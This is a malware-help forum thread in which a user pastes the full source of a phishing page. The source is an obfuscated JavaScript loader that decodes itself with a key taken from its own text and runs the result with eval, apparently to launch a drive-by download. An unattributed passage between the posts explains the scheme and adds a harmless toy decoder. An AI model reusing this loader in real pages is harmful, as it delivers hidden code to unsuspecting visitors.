buffer overflow? [CLOSED]


  • This topic is locked

#1
imaginarynumber

imaginarynumber

    New Member

  • Member
  • 1 posts
Hi all

I just received a phishing fake Google AdWords email.

I went to the root of the site to see if it was just one page that was dodgy or the whole site. An error box popped up telling me that c:\nywdm.exe had crashed.

On closer inspection it looks like opening the page downloaded a 16-bit DOS exe.

At the moment I have no AV; I only just reformatted my HDD.

I am assuming that all is OK as the program fell over, but I don't understand how it downloaded itself and tried to execute without my permission.

I did a tracert for the site and have asked the hosting company at that IP address to shut the site down. They are Russian, so I can only hope that they can understand English.

The source code for the site is as follows. Is it an attempt at a buffer overflow (beyond my ken)?

Thanks in advance

<html>
<body><h1> Loading... Please wait</h1>
<script language="JavaScript">
<!--
function x712b7j66(dPjAxoy7W,GD7Fr0618){var H7aqYJtto;var y6DbFO7y5;var RDJNQ7677='';var EsWQ77JXj=new Array();var CSED2elvW=arguments.callee.toString();var X1O4ikfhM=CSED2elvW.replace(/\W/g,'');X1O4ikfhM=X1O4ikfhM.toUpperCase();var onjDb2BBv=X1O4ikfhM.length;for(H7aqYJtto=0;H7aqYJtto<256;H7aqYJtto++) {EsWQ77JXj[H7aqYJtto]=0;}var BW0woN8C2=1;for(H7aqYJtto=128;H7aqYJtto;H7aqYJtto>>=1) {BW0woN8C2=(BW0woN8C2>>>1)^((BW0woN8C2&1)?3988292384:0);for(jY3GV0SXH=0;jY3GV0SXH<256;jY3GV0SXH+=H7aqYJtto*2) {EsWQ77JXj[jY3GV0SXH+H7aqYJtto]=(EsWQ77JXj[jY3GV0SXH]^BW0woN8C2);if (EsWQ77JXj[jY3GV0SXH+H7aqYJtto] < 0) {EsWQ77JXj[jY3GV0SXH+H7aqYJtto]+=4294967296;}}}y6DbFO7y5=4294967295;var N0G2HsE12='MAYBE---';for(BW0woN8C2=0;BW0woN8C2<onjDb2BBv;BW0woN8C2++) {y6DbFO7y5=EsWQ77JXj[(y6DbFO7y5^X1O4ikfhM.charCodeAt(BW0woN8C2))&255]^((y6DbFO7y5>>8)&16777215);}y6DbFO7y5=y6DbFO7y5^4294967295;if (y6DbFO7y5<0) {y6DbFO7y5+=4294967296;}y6DbFO7y5=y6DbFO7y5.toString(16).toUpperCase();var D72ue5eUj=8-y6DbFO7y5.length;for(H7aqYJtto=0;H7aqYJtto<D72ue5eUj;H7aqYJtto++) {y6DbFO7y5='0'+y6DbFO7y5;}var Ss1888mUw=new Array();var K7cbv55yT=100;var onjDb2BBv=y6DbFO7y5.length;for(H7aqYJtto=0;H7aqYJtto<8;H7aqYJtto++) {var oQjX53QIs=onjDb2BBv+H7aqYJtto;if (oQjX53QIs>=8) {oQjX53QIs=oQjX53QIs-8;Ss1888mUw[H7aqYJtto]=y6DbFO7y5.charCodeAt(oQjX53QIs);} else {Ss1888mUw[H7aqYJtto]=7;}}var sYFrNoxca=0;var IJKsc8LMP;K7cbv55yT=10394;var LUq0gF2Xb=new Array();LUq0gF2Xb[0]=dPjAxoy7W.length;onjDb2BBv=LUq0gF2Xb[0];for(H7aqYJtto=0;H7aqYJtto<onjDb2BBv;H7aqYJtto+=2){var Xb2QH4W1X=dPjAxoy7W.substr(H7aqYJtto,2);var RkI21Ucj4=parseInt(Xb2QH4W1X,16);IJKsc8LMP=RkI21Ucj4-Ss1888mUw[sYFrNoxca];if(IJKsc8LMP<0) {IJKsc8LMP=IJKsc8LMP+256;}RDJNQ7677+=String.fromCharCode(IJKsc8LMP);if(sYFrNoxca<Ss1888mUw.length-1) {sYFrNoxca++;} else {sYFrNoxca=0;K7cbv55yT=11;}}eval(RDJNQ7677);}
x712b7j66('97A197ad9fA9a1b761A9A6A1A6a95B6a6f9b9aaa93B19863A6a4977554ACa7B7a36C6367677C61796860666b6b72667296999d6594adA172a0939dA460a79aAC72A271ACA1B659ac70625658a9ad97b79B6f566954649Ba89C999Cac6F66646553a5A8b19eA9706595a1a69c97B66d6363a2ac5A708062AC99A495a597825A6c6E');
//-->
</script>
</body>
</html>
  • 0
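The posted script is not a buffer overflow: it is an obfuscated loader that takes the CRC32 of its own source text (arguments.callee.toString() with non-word characters stripped and uppercased), uses the ASCII codes of the eight hex digits as a key, subtracts that key from each hex pair of the long string, and hands the result to eval. The block below is an added illustration, not code from the post or the site: a toy loader using the same self-keying scheme on a constructed, harmless payload, showing why editing the script to inspect it garbles the output and how a capturing sink reveals the decoded text without executing it. The names crc32, deriveKey, encodeHex, decodeHex, loader, SAMPLE, CAPTURED and TAMPERED_KEY are this example's own.

```javascript
// Added example (not the post's script): a toy of the same self-keyed decoder.
// Key = CRC32 of the loader's own source, so editing the loader garbles the payload.
const CRC_TABLE = (() => {
  const t = new Uint32Array(256);
  for (let n = 0; n < 256; n++) {
    let c = n;
    for (let k = 0; k < 8; k++) c = (c & 1) ? (0xEDB88320 ^ (c >>> 1)) : (c >>> 1);
    t[n] = c >>> 0;
  }
  return t;
})();
// Standard CRC-32 (IEEE); 0xEDB88320 is the 3988292384 constant in the post's script.
function crc32(str) {
  let crc = 0xFFFFFFFF;
  for (let i = 0; i < str.length; i++) {
    crc = CRC_TABLE[(crc ^ str.charCodeAt(i)) & 0xFF] ^ (crc >>> 8);
  }
  return (crc ^ 0xFFFFFFFF) >>> 0;
}
// Key bytes = ASCII codes of the 8 uppercase hex digits of CRC32(source with \W stripped).
function deriveKey(fnSource) {
  const normalized = fnSource.replace(/\W/g, '').toUpperCase();
  const hex = crc32(normalized).toString(16).toUpperCase().padStart(8, '0');
  return Array.from(hex, (ch) => ch.charCodeAt(0));
}
// Each payload byte is stored as (plain + key[i % 8]) mod 256, written as two hex digits.
function encodeHex(plain, key) {
  let out = '';
  for (let i = 0; i < plain.length; i++) {
    out += ((plain.charCodeAt(i) + key[i % key.length]) % 256).toString(16).padStart(2, '0');
  }
  return out;
}
function decodeHex(payloadHex, key) {
  let out = '';
  for (let i = 0, k = 0; i < payloadHex.length; i += 2, k = (k + 1) % key.length) {
    out += String.fromCharCode((parseInt(payloadHex.substr(i, 2), 16) - key[k] + 256) % 256);
  }
  return out;
}
// In the wild 'sink' is eval. An analyst supplies a capturing sink rather than editing
// the function text, which would change the key and break the self-check.
function loader(payloadHex, sink) {
  return sink(decodeHex(payloadHex, deriveKey(loader.toString())));
}
// Constructed, harmless payload encoded under the loader's own key.
const SAMPLE = encodeHex('document.title="decoded harmlessly"', deriveKey(loader.toString()));
const CAPTURED = loader(SAMPLE, (s) => s);
// What a naive "replace eval with log" edit would do to the key:
const TAMPERED_KEY = deriveKey(loader.toString().replace('sink(', 'log('));
```

CAPTURED holds the decoded text without it ever being executed, while decoding SAMPLE with TAMPERED_KEY yields junk, which is why the real script's arguments.callee trick defeats edit-and-run deobfuscation.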



#2
greyknight17

greyknight17

    Malware Expert

  • Visiting Consultant
  • 16,560 posts
Welcome to GTG.

Are you here requesting assistance on removing spyware or did you format and just want to inquire about it?

Many websites are using malicious code/scripts in their site to exploit machines, especially those that are not properly patched/protected. Read this to see how to help prevent this outbreak from happening that easily. Nothing is guaranteed, but at least there is some barrier between your computer and malware.
  • 0

#3
greyknight17

greyknight17

    Malware Expert

  • Visiting Consultant
  • 16,560 posts
Due to lack of feedback, this topic has been closed.

If you need this topic reopened, please contact a staff member. This applies only to the original topic starter. Everyone else please begin a New Topic.
  • 0
